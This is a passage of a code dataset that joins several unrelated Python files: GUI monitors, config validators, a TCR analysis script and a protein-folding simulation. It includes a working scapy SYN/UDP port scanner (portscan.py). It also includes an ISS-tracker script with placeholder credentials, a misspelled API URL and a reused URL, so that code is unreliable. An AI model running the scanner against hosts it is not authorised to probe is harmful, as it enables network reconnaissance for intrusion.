= self.bg.scenario_data[floor - 1]['data'][str(search_time)]\n layer_height_data[floor_idx[floor - 1][0]:floor_idx[floor - 1][1]] = data\n danger_level.append(self.bg.set_danger_level_Layerheight(floor, data, set))\n\n danger_level_change = self.check_danger_level_changed(self.last_danger_level[minute], danger_level)\n if danger_level_change:\n self.last_danger_level[minute] = danger_level\n self.update_danger_level_DB(minute, danger_level)\n\n self.wc.set_node_weight_useLayerheight(layer_height_data)\n exit_routs = self.search_all_eixt_route(self.wc.node, watching_node)\n exit_rout_change = self.check_exit_route_changed(self.last_exit_rout[minute], exit_routs)\n if exit_rout_change:\n self.last_exit_rout[minute] = exit_routs\n self.update_exit_rout_DB(minute, exit_routs)\n\n else: # not change scenario\n if not self.bg.Watch_Present:\n layer_height_data = [3.0 for _ in range(188)]\n set = True\n watching_node = 'room' + str(self.bg.eva_draw.Start_floor) + str(self.bg.eva_draw.Start_room)\n\n for floor in range(5):\n data = []\n if floor != 0:\n if self.bg.scenario_data[floor - 1]['index'] != -1:\n search_time = self.bg.time_gap - self.bg.scenario_data[floor - 1]['diff'] + 1\n if search_time >= 60:\n search_time = 60\n elif search_time <= 1:\n search_time = 1\n data = self.bg.scenario_data[floor - 1]['data'][str(search_time)]\n layer_height_data[floor_idx[floor - 1][0]:floor_idx[floor - 1][1]] = data\n self.bg.set_danger_level_Layerheight(floor, data, set)\n self.wc.set_node_weight_useLayerheight(layer_height_data)\n self.search_all_eixt_route(self.wc.node, watching_node)\n\n #endregion\n\n\n else:\n self.bg.eva_draw.Fire = [False for _ in range(5)]\n self.bg.gl_draw.show_route = False\n self.bg.eva_draw.path_route = None\n\n if self.bg.Watch_Mode == 0:\n if True in self.bg.eva_draw.Fire:\n if self.ui.WatchMode_Highlight.isChecked():\n for floor in range(6):\n if floor == self.bg.eva_draw.Start_floor:\n self.bg.gl_draw.Transparency[floor] = 1.0\n else:\n self.bg.gl_draw.Transparency[floor] = 0.1\n else:\n for floor in range(6):\n self.bg.gl_draw.Transparency[floor] = 1.0\n else:\n for floor in range(6):\n self.bg.gl_draw.Transparency[floor] = 1.0\n\n self.pd.data_plot(temp_datas, gas_datas)\n self.data_log(temp_datas[-1], gas_datas[-1])\n\n except Exception as e:\n print(e)\n\n def change_Watch_Mode(self):\n if self.ui.WatchMode0.isChecked():\n self.bg.Watch_Mode = 0\n self.ui.WatchFloor_comboBox.setEnabled(False)\n\n if True in self.bg.eva_draw.Fire:\n if self.ui.WatchMode_Highlight.isChecked():\n for floor in range(6):\n if floor == self.bg.eva_draw.Start_floor:\n self.bg.gl_draw.Transparency[floor] = 1.0\n else:\n self.bg.gl_draw.Transparency[floor] = 0.1\n else:\n for floor in range(6):\n self.bg.gl_draw.Transparency[floor] = 1.0\n else:\n for floor in range(6):\n self.bg.gl_draw.Transparency[floor] = 1.0\n elif self.ui.WatchMode1.isChecked():\n self.bg.Watch_Mode = 1\n self.ui.WatchFloor_comboBox.setEnabled(True)\n for floor in range(6):\n self.bg.gl_draw.Transparency[floor] = 1.0\n elif self.ui.WatchMode2.isChecked():\n self.bg.Watch_Mode = 2\n self.ui.WatchFloor_comboBox.setEnabled(True)\n for floor in range(6):\n self.bg.gl_draw.Transparency[floor] = 1.0\n\n self.bg.trans_pos_x, self.bg.trans_pos_y, self.bg.trans_pos_z = (0, 0, 0)\n self.bg.x_angle, self.bg.z_angle = 1, 1\n\n # camera\n self.bg.last_pos_x, self.bg.last_pos_y, self.bg.last_pos_z = 0.0, 5.0, -5.0\n\n # object move\n self.bg.move_last_pos_x, self.bg.move_last_pos_y, self.bg.move_last_pos_z = 0.0, 0.0, 0.0\n self.bg.trans_pos_x, self.bg.trans_pos_y, self.bg.trans_pos_z = 0, 0, 0\n\n def change_Start_Floor(self):\n self.bg.eva_draw.Start_floor = self.ui.StartFloor_comboBox.currentIndex()\n if self.bg.eva_draw.Start_floor == 0:\n self.ui.StartRoom_comboBox.clear()\n for i in range(2):\n self.ui.StartRoom_comboBox.addItem(str(i + 1))\n else:\n self.ui.StartRoom_comboBox.clear()\n for i in range(7):\n self.ui.StartRoom_comboBox.addItem(str(i + 1))\n self.bg.eva_draw.Start_room = 0\n\n def change_Start_Room(self):\n if self.ui.StartRoom_comboBox.currentIndex() >= 0:\n self.bg.eva_draw.Start_room = self.ui.StartRoom_comboBox.currentIndex()\n\n def change_Watch_Floor(self):\n self.bg.gl_draw.Watch_floor = self.ui.WatchFloor_comboBox.currentIndex()\n self.bg.eva_draw.Watch_floor = self.bg.gl_draw.Watch_floor\n self.bg.gl_draw.Transparency[self.bg.gl_draw.Watch_floor] = 1.0\n\n def change_N_Mode(self):\n if self.ui.watch_present.isChecked():\n self.bg.Watch_Present = True\n self.ui.N_min_later_combobox.setEnabled(False)\n else:\n self.ui.N_min_later_combobox.setEnabled(True)\n self.bg.Watch_Present = False\n self.ui.N_min_later_combobox.setCurrentIndex(0)\n self.bg.time_gap = self.ui.N_min_later_combobox.currentIndex()\n\n def change_N_min(self):\n self.bg.time_gap = self.ui.N_min_later_combobox.currentIndex()\n\n def thread_end(self, object):\n self.thread_event_set_ui()\n\n def system_log(self, log):\n\n time_str = datetime.today().strftime('%H:%M:%S.%f')[:-3]\n\n self.ui.system_log_table.setRowCount(self.ui.system_log_table.rowCount() + 1)\n self.ui.system_log_table.setItem(self.ui.system_log_table.rowCount() - 1, 0, QTableWidgetItem(time_str))\n self.ui.system_log_table.setItem(self.ui.system_log_table.rowCount() - 1, 1, QTableWidgetItem(log))\n self.ui.system_log_table.scrollToBottom()\n\n def data_log(self, temp_log, gas_log):\n\n time_str = datetime.today().strftime('%H:%M:%S.%f')[:-3]\n temp_item = ', '.join([str(data) for data in temp_log][1:])\n gas_item = ', '.join([str(data) for data in gas_log][1:])\n\n self.ui.temp_data_log_table.setRowCount(self.ui.temp_data_log_table.rowCount() + 1)\n self.ui.gas_data_log_table.setRowCount(self.ui.gas_data_log_table.rowCount() + 1)\n self.ui.temp_data_log_table.setItem(self.ui.temp_data_log_table.rowCount() - 1, 0, QTableWidgetItem(time_str))\n self.ui.gas_data_log_table.setItem(self.ui.gas_data_log_table.rowCount() - 1, 0, QTableWidgetItem(time_str))\n self.ui.temp_data_log_table.setItem(self.ui.temp_data_log_table.rowCount() - 1, 1, QTableWidgetItem(temp_item))\n self.ui.gas_data_log_table.setItem(self.ui.gas_data_log_table.rowCount() - 1, 1, QTableWidgetItem(gas_item))\n if self.ui.temp_data_log_table.rowCount() > 20:\n self.ui.temp_data_log_table.removeRow(0)\n if self.ui.gas_data_log_table.rowCount() > 20:\n self.ui.gas_data_log_table.removeRow(0)\n self.ui.temp_data_log_table.scrollToBottom()\n self.ui.gas_data_log_table.scrollToBottom()","repo_name":"yawayo/Fire_Hazard_Response_Program","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":79883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32578561736","text":"#! /usr/bin/python\n\nimport sys\nimport logging\nfrom scapy.layers.inet import *\nimport threading\n\nlogging.getLogger(\"scapy.runtime\").setLevel(logging.ERROR) # This is supress scapy warnings\nconf.verb = 0\nconf.nofilter = 1\nglobal verbose_mode\n\n\nclass Port:\n def __init__(self, type, port):\n self.type = type\n self.port = port\n\n\ndef syn_tcp_is_open(ip, port, timeout):\n src_port = RandShort()\n result = sr1(IP(dst=ip) / TCP(sport=src_port, dport=port, flags=\"S\"), timeout=timeout)\n if result is None:\n return False, -1\n elif result.haslayer(TCP) and result.getlayer(TCP).flags == 0x12:\n return True, result.time\n else:\n return False, -1\n\n\ndef udp_is_open(ip, port, timeout):\n result = sr1(IP(dst=ip) / UDP(dport=port), timeout=timeout)\n if result is None:\n return False, -1\n elif result.haslayer(UDP):\n return True, result.time\n else:\n return False, -1\n\n\ndef start(ip, ports, timeout):\n global verbose_mode\n\n for port in ports:\n if port.type == 'UDP':\n is_open, tm = udp_is_open(ip, port.port, timeout)\n else:\n is_open, tm = syn_tcp_is_open(ip, port.port, timeout)\n\n if is_open and verbose_mode and port.type == 'TCP':\n print(f\"{port.type} {port.port} {tm}\")\n elif is_open:\n print(f\"{port.type} {port.port}\")\n\n\ndef main():\n global verbose_mode\n OPTIONS = [i for i in sys.argv if '-' in i]\n\n timeout_options = [i for i in OPTIONS if '--timeout' in i]\n timeout = 2\n\n if len(timeout_options) == 1:\n t_opt = timeout_options[0]\n timeout = int(t_opt.split('=')[1])\n\n vm_options = [i for i in OPTIONS if '--verbose' in i or '-v' in i]\n if len(vm_options) == 1:\n verbose_mode = True\n else:\n verbose_mode = False\n\n IND_IP = 1\n for i in range(len(sys.argv[1:])):\n ind = i + 1\n if '-' not in sys.argv[ind]:\n IND_IP = int(ind)\n break\n ip = sys.argv[IND_IP]\n\n PORTS = []\n\n for x in sys.argv[IND_IP+1:]:\n type_connect, input_ports = x.split('/')[0], x.split('/')[1]\n if ',' in input_ports:\n ports = [int(i) for i in input_ports.split(',')]\n if type_connect == 'tcp':\n PORTS += [Port('TCP', i) for i in ports]\n elif type_connect == 'udp':\n PORTS += [Port('UDP', i) for i in ports]\n elif '-' in input_ports:\n start_port, end_port = int(input_ports.split('-')[0]), int(input_ports.split('-')[1])\n if type_connect == 'tcp':\n for i in range(start_port, end_port + 1):\n PORTS.append(Port('TCP', i))\n elif type_connect == 'udp':\n for i in range(start_port, end_port + 1):\n PORTS.append(Port('UDP', i))\n else:\n if type_connect == 'tcp':\n PORTS.append(Port('TCP', int(input_ports)))\n elif type_connect == 'udp':\n PORTS.append(Port('UDP', int(input_ports)))\n\n num_threads_options = [i for i in OPTIONS if '--num-threads' in i or '-j' in i]\n num_threads = 1\n\n if len(num_threads_options) == 1:\n t_opt = num_threads_options[0]\n num_threads = int(t_opt.split('=')[1])\n\n count_ports_in_thread = int(len(PORTS) / num_threads)\n\n first_port = 0\n for i in range(num_threads - 1):\n threading.Thread(target=start, args=(ip, PORTS[first_port:first_port+count_ports_in_thread], timeout)).start()\n first_port = (i + 1) * count_ports_in_thread\n threading.Thread(target=start, args=(ip, PORTS[first_port:], timeout)).start()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NikitaUnisikhin/Port-Scanner","sub_path":"portscan.py","file_name":"portscan.py","file_ext":"py","file_size_in_byte":3683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32973623209","text":"import requests\nimport smtplib\nimport time\nfrom datetime import datetime\n\nMY_LAT = 36.609554\nMY_LONG = 127.515285\nMY_EMAIL = 'thisisid@gmail.com'\nMY_PASSWORD = 'thisispassword'\n\ndef isOverhead():\n response = requests.get(url='http://api.open-notify.org/iss-noew.json')\n response.raise_for_status()\n data = response.json()\n\n iss_lat = float(data['iss_position']['latitude'])\n iss_long = float(data['iss_position']['longitude'])\n\n if MY_LAT - 5 <= iss_lat <= MY_LAT + 5 and MY_LONG - 5 <= iss_long <= MY_LONG + 5:\n return True\n\ndef isNight():\n parameters = {\n 'lat': MY_LAT,\n 'lng': MY_LONG,\n 'formatted': 0,\n }\n\n response = requests.get(url='http://api.open-notify.org/iss-noew.json', params=parameters)\n response.raise_for_status()\n data = response.json()\n\n sunrise = int(data['result']['sunrise'].split('T')[1].split(':')[0])\n sunset = int(data['result']['sunset'].split('T')[1].split(':')[0])\n\n time_now = datetime.now().hour\n if time_now >= sunset or time_now <= sunrise:\n return True\n\nwhile True:\n time.sleep(60)\n if isOverhead() and isNight():\n connection = smtplib.SMTP('smtp.gmail.com')\n connection.starttls()\n connection.login(MY_EMAIL, MY_PASSWORD)\n connection.sendmail(\n from_addr=MY_EMAIL,\n to_addrs=MY_EMAIL,\n msg='Subject:Look up ISS\\n\\nISS is above you in the sky.\\nISS 위성이 당신의 머리 위 밤하늘에 지나가고 있습니다.'\n )","repo_name":"pokavv/SimplePython","sub_path":"track_iss/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71389141921","text":"\"\"\"Classes that check the values in the dictionary included in the code\"\"\"\n\nimport copy\nimport json\n\nfrom .constants import CATEGORICAL_SCHEMES, ORDERED_SCHEMES\n\n\nclass DictKWS:\n def __init__(self):\n self.kws = {}\n\n def __repr__(self):\n aux = copy.deepcopy(self.kws)\n for attr, value in self.__dict__.items():\n if attr != \"kws\":\n aux.update(value.kws)\n\n return json.dumps(aux)\n\n\nclass LegendHoverKws(DictKWS):\n def __init__(self, legend_kws):\n super().__init__()\n self.kws = {\n \"show\": True,\n \"scale_size\": 1,\n \"color_source_hovered\": \"#2c7bb6\",\n \"color_target_hovered\": \"#d7191c\",\n }\n self.kws.update(legend_kws)\n\n\nclass NodeCircleKws(DictKWS):\n def __init__(self, node_kws, dataset):\n super().__init__()\n self.kws = {\"tooltip\": None, \"hover\": True}\n self.color = ColorAttribute(dataset, node_kws)\n self.size = SizeAttribute(dataset, node_kws)\n for key in node_kws:\n if key in self.kws:\n self.kws[key] = node_kws[key]\n\n\nclass LinkRectKws(DictKWS):\n def __init__(self, node_kws, dataset):\n super().__init__()\n self.kws = {\n \"tooltip\": None,\n \"hover\": True,\n \"hover_rect_color\": \"#dbdbdb\",\n \"hover_text_color\": \"red\",\n }\n self.color = ColorAttribute(dataset, node_kws)\n for key in node_kws:\n if key in self.kws:\n self.kws[key] = node_kws[key]\n\n\nclass LinkLineKws(DictKWS):\n def __init__(self, node_kws, dataset):\n super().__init__()\n self.kws = {\"tooltip\": None, \"stroke_width\": None, \"hover\": True}\n self.color = ColorAttribute(dataset, node_kws)\n for key in node_kws:\n if key in self.kws:\n self.kws[key] = node_kws[key]\n\n\nclass SizeAttribute:\n def __init__(self, dataset, node_kws) -> None:\n self.kws = {\n \"size_attribute\": None,\n \"size_scale_type\": \"lineal\",\n \"size_default\": None,\n \"scale_domain_function\": None,\n \"scale_range_function\": [2, 5],\n }\n for key in node_kws:\n if key in self.kws:\n self.kws[key] = node_kws[key]\n\n self.check_size(dataset)\n\n def check_size(self, dataset):\n node_kws = self.kws\n attr = node_kws[\"size_attribute\"]\n size_d_extreme = node_kws[\"scale_domain_function\"]\n if attr is None or node_kws[\"size_default\"] is not None:\n return\n\n assert node_kws[\"size_scale_type\"] in [\n \"lineal\",\n \"pow\",\n \"sqrt\",\n \"log\",\n ], \"size_scale_type should be 'lineal', 'pow', 'sqrt' or 'log'\"\n\n assert isinstance(\n node_kws[\"scale_range_function\"], list\n ), \"scale_range_function should be an array with integers or floats\"\n\n for d in node_kws[\"scale_range_function\"]:\n assert isinstance(\n d, (int, float)\n ), \"Every element in scale_range_function should be int or float\"\n\n for node in dataset[\"nodes\"]:\n assert (\n attr in node\n ), \"All nodes should contain the attribute defined in size_attribute\"\n assert isinstance(\n node[attr], (int, float)\n ), \"The attribute should be and integer or float\"\n\n if size_d_extreme is not None:\n assert len(size_d_extreme) == len(\n node_kws[\"scale_range_function\"]\n ), \"scale_domain_function and scale_range_function should have the same lenght\"\n for d in size_d_extreme:\n assert isinstance(\n d, (int, float)\n ), \"if scale_domain_function is not None, every element in scale_domain_function should be int or float\"\n else:\n assert (\n len(node_kws[\"scale_range_function\"]) == 2\n ), \"if scale_domain_function is None, scale_range_function should be an array with 2 elements\"\n\n\nclass ColorAttribute:\n def __init__(self, dataset, node_kws) -> None:\n self.kws = {\n \"color_attribute\": None,\n \"color_attribute_type\": \"categorical\",\n \"color_scale_type\": \"lineal\", # Only for numerical\n \"color_scheme\": None,\n \"color_domain_function\": None, # num: [min, max] - ord/cat: None or list of uniques values\n \"color_default\": None,\n \"color_unknown\": None,\n }\n for key in node_kws:\n if key in self.kws:\n self.kws[key] = node_kws[key]\n\n if self.kws[\"color_scheme\"] is None:\n self.kws[\"color_scheme\"] = (\n \"Tableau10\"\n if self.kws[\"color_attribute_type\"] == \"categorical\"\n else \"Blues\"\n )\n\n self.check_color(dataset)\n\n def check_color(self, dataset):\n node_kws = self.kws\n if node_kws[\"color_attribute\"] is None:\n return\n\n color_d_function = node_kws[\"color_domain_function\"]\n if color_d_function is None:\n assert (\n node_kws[\"color_unknown\"] is None\n ), \"Only define color_unknown if you define color_domain_function\"\n\n assert node_kws[\"color_attribute_type\"] in [\n \"numerical\",\n \"categorical\",\n \"ordinal\",\n ], \"size_scale_type should be 'numerical', 'categorical' or 'ordinal'\"\n if node_kws[\"color_attribute_type\"] == \"numerical\":\n assert node_kws[\"color_scale_type\"] in [\n \"lineal\",\n \"pow\",\n \"sqrt\",\n \"log\",\n ], \"color_scale_type should be 'lineal', 'pow', 'sqrt' or 'log'\"\n assert node_kws[\"color_scheme\"] in ORDERED_SCHEMES\n\n assert (\n color_d_function is None or len(color_d_function) == 2\n ), \"If color_attribute_type is numerical, color_domain_function should be None or array with 2 element\"\n\n elif node_kws[\"color_attribute_type\"] == \"categorical\":\n assert node_kws[\"color_scheme\"] in CATEGORICAL_SCHEMES\n\n else: # node_kws[\"color_attribute_type\"] == \"ordinal\":\n assert node_kws[\"color_scale_type\"] in [\n \"lineal\",\n \"pow\",\n \"sqrt\",\n \"log\",\n ], \"color_scale_type should be 'lineal', 'pow', 'sqrt' or 'log'\"\n assert node_kws[\"color_scheme\"] in ORDERED_SCHEMES\n\n for node in dataset[\"nodes\"]:\n assert (\n node_kws[\"color_attribute\"] in node\n ), \"All nodes should contain the attribute defined in color_attribute\"\n","repo_name":"Hernan4444/PyNetworkD3","sub_path":"PyNetworkD3/kws.py","file_name":"kws.py","file_ext":"py","file_size_in_byte":6754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33486291480","text":"from PyQt5 import QtWidgets, QtGui, QtCore\nfrom PyQt5.QtWidgets import QApplication, QMainWindow\nfrom V4 import Ui_MainWindow\nimport sys\nimport pyqtgraph as pg\nimport time\nimport cv2\n\nimport requests\nurl = \"https://monitor.icmems.ml/api/getDatas\"\n# print(getjsons.json())\nclass MainWindow(QtWidgets.QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.setUp()\n # ComboBox1\n self.ui.comboBox1.addItems(self.section)\n # self.ui.comboBox1.currentIndexChanged.connect(self.display)\n self.ui.comboBox1.currentIndexChanged\n # ComboBox2\n self.ui.comboBox2.addItems(self.sensors)\n self.ui.comboBox2.currentIndexChanged.connect(self.changeFollowBedDisplay)\n # checkBox1\n self.ui.checkBox1.stateChanged.connect(self.show_Features)\n # checkBox2\n self.ui.checkBox2.stateChanged.connect(self.show_Features)\n # checkBox3\n self.ui.checkBox3.stateChanged.connect(self.show_Features)\n self.changeFollowBedDisplay()\n # self.getFixFointData()\n self.timer = QtCore.QTimer()\n self.timer.setInterval(120*1000)\n # self.timer.timeout.connect(self.changeFollowBedDisplay, self.getFixFointData)\n self.timer.timeout.connect(self.changeFollowBedDisplay)\n self.timer.start()\n\n def setUp(self):\n # MainWindow Title\n self.setWindowTitle('蘭花微氣候監測系統')\n # label1\n self.ui.label1.setText('第六區監測')\n # label2\n self.ui.label2.setText('隨床監測:')\n # groupBox\n self.ui.groupBox.setTitle('第六區')\n # global checkBoxes\n self.checkBoxes = [self.ui.checkBox1, self.ui.checkBox2, self.ui.checkBox3]\n # ComboBox1\n self.section = ['第六區']\n # ComboBox2\n self.sensors = ['F1', 'F2', 'F3', 'F4', 'F5', 'F6',]\n # checkBox1\n self.ui.checkBox1.setText('溫度 (Temp)')\n # checkBox2\n self.ui.checkBox2.setText('濕度 (Humid)')\n # checkBox3\n self.ui.checkBox3.setText('光照量 (micromol)')\n # time\n self.time = time.time()\n # label-'voltage_meter'\n self.ui.voltage_meter.setText('電池更換警示')\n # label-'update_time'\n self.ui.update_time.setText('上次更新時間:')\n # graphicsView_2 setting\n self.para_names = ['temperature', 'humidity', 'light']\n self.colors = [\"#D3D4\", \"#4B88A2\", \"#BB0A21\"]\n labelStyle = {'color': '#000000', 'font-size': '14pt'}\n self.ui.graphicsView_2.setLabel('left', \"Temperature & RH\", units='Celsius & %', **labelStyle)\n self.ui.graphicsView_2.setLabel('right', \"PAR\", units='micro mol', **labelStyle)\n # self.ui.graphicsView_2.setLabel('bottom', \"Date\", units='', **labelStyle)\n self.ui.graphicsView_2.setBackground('w')\n # graphicsView setting\n self.fixedsensors = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12']\n\n\n def changeFollowBedDisplay(self):\n followBed = self.ui.comboBox2.currentText()\n # print(followBed[1])\n dataUrl = url+\"/9\"+followBed[1]\n getjsons = requests.get(dataUrl).json()\n # print(dataUrl)\n \n self.temp = []\n self.humid = []\n self.light = []\n self.timestamp = []\n for n in range(len(getjsons['data'][-288*5:])):\n self.temp.append(getjsons['data'][n-288*5]['temperature'])\n self.humid.append(getjsons['data'][n-288*5]['wetness'])\n self.light.append(getjsons['data'][n-288*5]['par'])\n self.timestamp.append(getjsons['data'][n-288*5]['time'])\n print(len(self.timestamp))\n print(len(self.temp))\n print(len(self.humid))\n print(len(self.light))\n print(self.time)\n self.paras = [self.temp, self.humid, self.light]\n self.show_Features()\n # Time~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n self.the_last_unixTC = getjsons['data'][-1]['time']/1000\n self.struct_time = time.localtime(self.the_last_unixTC)\n # print(type(self.the_last_unixTC))\n self.date_form = time.strftime(\"%Y-%m-%d %H:%M:%S\", self.struct_time)\n print(type(self.date_form))\n self.ui.update_time.setText('上次更新時間:{}'.format(self.date_form))\n # Time~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n def show_Features(self):\n self.ui.graphicsView_2.clear()\n for n in range(len(self.checkBoxes)):\n if self.checkBoxes[n].isChecked():\n # self.checkBoxes[n].setBackground(self.colors[n])\n print(\"add {} feature\".format(self.para_names[n]))\n self.ui.graphicsView_2.plot(self.timestamp, self.paras[n], pen=pg.mkPen(color=self.colors[n], width=3))\n # self.ui.graphicsView_2.setXRange(self.time-24*60*60*3, self.time)\n pg.QtGui.QApplication.processEvents()\n\n # def getFixFointData(self):\n # self.all_latest_temp = []\n # self.all_latest_humid = []\n # self.all_latest_light = []\n # self.ui.graphicsView.clear()\n # for n in self.fixedsensors:\n # fixdataURL = url+\"/\"+self.fixedsensors[n]\n # fixdata_getjsons = requests.get(fixdataURL).json()\n # self.all_latest_temp.append(fixdata_getjsons['data'][-1]['temperature'])\n # self.all_latest_humid.append(fixdata_getjsons['data'][-1]['wetness'])\n # self.all_latest_light.append(fixdata_getjsons['data'][-1]['par'])\n \n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication([])\n window = MainWindow()\n window.show()\n sys.exit(app.exec_())\n","repo_name":"chengzee/disease_predict","sub_path":"orchid_DiseasePredict/pyqt-tutorial/mainV2.py","file_name":"mainV2.py","file_ext":"py","file_size_in_byte":5782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41654011114","text":"'''\nThis script takes a model fit to distinguish AB1 from RENCA TCRs on timepoint 0 and assesses the predictive signature at timepoints 2,4,6.\n'''\nfrom DeepTCR.DeepTCR import DeepTCR_WF\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_curve, roc_auc_score\n\ndf = pd.read_csv('../data/data.tsv',sep='\\t')\ndf['Sample_ID'] = 'Model'+'_'+ df['Model'] +\\\n '_'+ 'Mouse' +'_'+df['Mouse'].astype(str) + \\\n '_' + 'Timepoint'+'_'+df['Timepoint'].astype(str)\n\ndf_count = df.groupby(['Sample_ID']).agg({'count':'sum'}).reset_index()\ncount_dict = dict(zip(df_count['Sample_ID'],df_count['count']))\ndf['count_sum'] = df['Sample_ID'].map(count_dict)\ndf['count_sum'] = df['count_sum'].astype(int)\ndf['freq'] = df['count']/df['count_sum']\n\ntimepoint_train = 0\n\nDFs = []\nfor timepoint_inf in [2,4,6]:\n df_sel = df[df['Timepoint'] == timepoint_inf]\n beta_sequences = np.array(df_sel['CDR3'])\n v_beta = np.array(df_sel['v_gene'])\n j_beta = np.array(df_sel['j_gene'])\n counts = np.array(df_sel['count'])\n sample_labels = np.array(df_sel['Sample_ID'])\n class_labels = np.array(df_sel['Model'])\n\n DTCR = DeepTCR_WF('model_'+str(timepoint_train))\n DTCR.Sample_Inference(sample_labels=sample_labels,\n beta_sequences=beta_sequences,\n v_beta=v_beta,\n j_beta=j_beta,\n counts=counts,\n models=['model_' + str(x) for x in np.random.choice(25, 10, replace=False)])\n\n df_label = df_sel[['Sample_ID','Model']].drop_duplicates()\n label_dict = dict(zip(df_label['Sample_ID'],df_label['Model']))\n df_pred = DTCR.Inference_Pred_Dict['AB1'][:]\n df_pred['Model'] = df_pred['Samples'].map(label_dict)\n df_pred['Model_bin'] = 0\n df_pred['Model_bin'][df_pred['Model']=='AB1']=1\n DFs.append(df_pred)\n\nfig,ax = plt.subplots()\nfor df_pred,timepoint_inf in zip(DFs,[2,4,6]):\n roc_score = roc_auc_score(df_pred['Model_bin'],df_pred['Pred'])\n fpr,tpr,_ = roc_curve(df_pred['Model_bin'],df_pred['Pred'])\n plt.plot(fpr,tpr,lw=2,label='%s (area = %0.4f)' % (str(timepoint_inf), roc_score))\nplt.xlabel('False Positive Rate',fontsize=16)\nplt.ylabel('True Positive Rate',fontsize=16)\nplt.plot([0, 1], [0, 1], color='navy', lw=2, linestyle='--')\nplt.legend(loc='lower right')\nplt.tight_layout()\n\nDFs = pd.concat(DFs)\nDFs.to_csv('Supp4B.csv',index=False)\n","repo_name":"22461922Joel/Murine-tumour-dynamics-DeepTCR-2022","sub_path":"scripts/inf_model.py","file_name":"inf_model.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70137638883","text":"import screen\nimport objects\n#In Game Variables\nGRAVITY = 1\nFRICTION = 1\nDEFAULT_FLOOR_LEVEL = screen.HEIGHT - 5\nFLOOR_LEVEL = DEFAULT_FLOOR_LEVEL\n\nFLOOR_LEVEL_LIST = []\n\ndef update_floor_height():\n level_list = [[DEFAULT_FLOOR_LEVEL] for i in range(screen.WIDTH)]\n for surface in objects.STATIC_LIST:\n surface_range = surface.get_walkable_surface()\n for pixel in range(surface_range[0], surface_range[1]):\n try:\n if surface.y not in level_list[pixel]:\n level_list[pixel].append(surface.y)\n except IndexError:\n continue\n return level_list\n\nfor pixel in range(screen.WIDTH):\n FLOOR_LEVEL_LIST.append([DEFAULT_FLOOR_LEVEL])\n\nupdate_floor_height()","repo_name":"LewPort/Hard2Get","sub_path":"levels.py","file_name":"levels.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7335120230","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 26 10:34:09 2018\n\n@author: John\n\"\"\"\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom numba import jit\nimport math\n\nnp.set_printoptions(threshold=np.nan)\n\n\n\n\n\nT = 10\nN = 15\nMCS = 10000000\n\n\n# Interaction energies between different types of acids\n# Interaction energy between type i and type j is J[i, j]\nJ = np.random.uniform(-4, -2, size=(20, 20))\nJ = np.hstack((np.zeros((J.shape[0],1)),J)) # Type 0 doesn't exist, has an interaction energy\nJ = np.vstack((np.zeros((1,J.shape[1])),J)) # of 0 with every type\n\n\n# Initially, no acids are non-bonded nearest-neighbours\nE_chain = 0\n\n\n# Make 2N by 2N lattice to ensure that the protein has rooom to fold\nlattice = np.zeros(shape=(2*N,2*N), dtype=int)\n\n\n# The type of each acid in the chain\ntypes = np.random.randint(1, 21, size=N, dtype=int)\n\n\n# Create x and y coordinates such that the chain will be horizontal, and centered in the 2N x 2N lattice\nx_start = int(N/2)\nx_end = int(3*N/2)\npos_xs = np.arange(x_start, x_end, dtype=int)\npos_ys = np.empty(N, dtype=int); pos_ys.fill(N)\n\n\n# Zip type, x_pos, and y_pos to create array defining each acid (this is the protein)\nA = np.empty(shape=(N,3), dtype=int)\nfor i in range(A.shape[0]):\n A[i] = np.array([types[i], pos_xs[i], pos_ys[i]])\n \n \n \n# Put protein on lattice\nlattice[N, x_start:x_end] = types\n\n\n# Pre-select random acid and neighbour picks for better performance\nacid_picks = np.random.randint(0, A.shape[0], size=MCS) # 1 acid picked from A each MCS\ncurr_acid_pick = 0\n\nneigh_picks = np.random.randint(0, 4, size=MCS) # 1 acid picked from A each MCS\ncurr_neigh_pick = 0\n\nprob_picks = np.random.uniform(0, 1, size=MCS)\ncurr_prob_pick = 0\n\n#left-down, left-up, right-up, right-down\nmove_neighs = np.array([(-1,1), (-1,-1), (1,-1), (1,1)], dtype=int)\n\n\n\n\n@jit\ndef get_neighbours(x, y):\n left = (x-1, y) if not x == 0 else None\n bottom = (x, y+1) if not y == lattice.shape[1]-1 else None\n right = (x+1, y) if not x == lattice.shape[0]-1 else None\n top = (x, y-1) if not y == 0 else None\n \n return [left, bottom, right, top]\n\n\n@jit\ndef energy(a_type, x, y, partners):\n \n neighbours = get_neighbours(x, y)\n \n #print(\"\\nEnergy:\\nFor \" + str(x) + \", \" + str(y))\n \n E = 0\n for neigh in neighbours:\n \n if neigh not in partners:\n \n #print(str(neigh) + \" \" + str(lattice[neigh[1], neigh[0]]))\n \n neigh_type = lattice[neigh[1], neigh[0]] # SLOW\n E += J[a_type, neigh_type]\n \n #print(\"E: \" + str(E))\n return E\n\n\n\n\n# Selects one acid, determines the change in energy from moving 